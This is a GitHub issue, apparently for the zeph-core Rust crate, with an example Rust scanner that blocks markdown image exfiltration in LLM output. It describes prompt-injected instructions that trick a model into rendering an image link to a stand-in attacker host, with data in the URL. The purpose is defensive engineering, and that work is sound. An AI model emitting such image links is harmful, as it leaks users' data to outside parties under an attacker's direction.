[SEC-4.1] Markdown image exfiltration guard #1205

@bug-ops

Description

Part of #1195 — Phase 4

Block markdown image injection in LLM output — a known exfiltration vector where injected instructions trick the model into rendering ![](https://attacker.com/steal?data=...).

Crates: zeph-core
Depends on: SEC-1.1

Tasks:

  • Output scanner: detect ![...](http...) patterns in LLM response
  • Strip or replace with [blocked external image: ...] when URL is not in user's original message
  • Allowlist for known safe domains (configurable)
  • Config: [security.exfiltration_guard] block_markdown_images = true
  • Unit tests with various markdown image injection variants

Files: crates/zeph-core/src/sanitizer/exfiltration.rs (new)
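An added example (not zeph-core's own code) of the scanner the tasks above describe, in Rust with the standard library only: it rewrites `![alt](http...)` images whose URL was not quoted in the user's message and whose host is not allowlisted. The function names, the allowlist parameter, the subdomain matching rule and the host-only placeholder text are assumptions.

```rust
/// Hypothetical guard (added example, not zeph-core's own code): rewrite `![alt](http...)` images
/// whose URL is neither quoted in the user's own message nor hosted on an allowlisted domain.
pub fn guard_markdown_images(output: &str, user_message: &str, allowed: &[&str]) -> String {
    let mut out = String::with_capacity(output.len());
    let mut rest = output;
    while let Some(start) = rest.find("![") {
        out.push_str(&rest[..start]);
        let tail = &rest[start..];
        // Locate "](" closing the alt text, then the ")" closing the URL.
        let span = tail.find("](").and_then(|a| tail[a + 2..].find(')').map(|u| (a, a + 2 + u)));
        match span {
            Some((alt_end, close)) => {
                let url = tail[alt_end + 2..close].trim();
                if is_http(url) && !user_message.contains(url) && !host_allowed(url, allowed) {
                    // Echo only the host: the query string is where exfiltrated data would sit.
                    let host = host_of(url).unwrap_or_default();
                    out.push_str(&format!("[blocked external image: {}]", host));
                } else {
                    out.push_str(&tail[..=close]);
                }
                rest = &tail[close + 1..];
            }
            None => {
                out.push_str("![");
                rest = &tail[2..];
            }
        }
    }
    out.push_str(rest);
    out
}
fn is_http(url: &str) -> bool {
    let l = url.to_ascii_lowercase();
    l.starts_with("http://") || l.starts_with("https://")
}
/// Host part of a URL, lowercased, with any userinfo and port removed.
fn host_of(url: &str) -> Option<String> {
    let rest = url.split_once("://")?.1;
    let end = rest.find(|c: char| matches!(c, '/' | '?' | '#')).unwrap_or(rest.len());
    let authority = &rest[..end];
    let host = authority.rsplit('@').next().unwrap_or(authority);
    Some(host.split(':').next().unwrap_or(host).to_ascii_lowercase())
}
/// Exact match or subdomain of an allowlisted domain (case-insensitive).
fn host_allowed(url: &str, allowed: &[&str]) -> bool {
    host_of(url).map_or(false, |h| allowed.iter().any(|d| {
        let d = d.to_ascii_lowercase();
        h == d || h.ends_with(&format!(".{}", d))
    }))
}
```

Relative and `data:` image sources are left alone; only `http`/`https` URLs are subject to the user-message and allowlist checks.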

Metadata

Labels: core (zeph-core crate), priority/high (High priority), security (Security-related issue), size/S (Small PR, 11-50 lines)
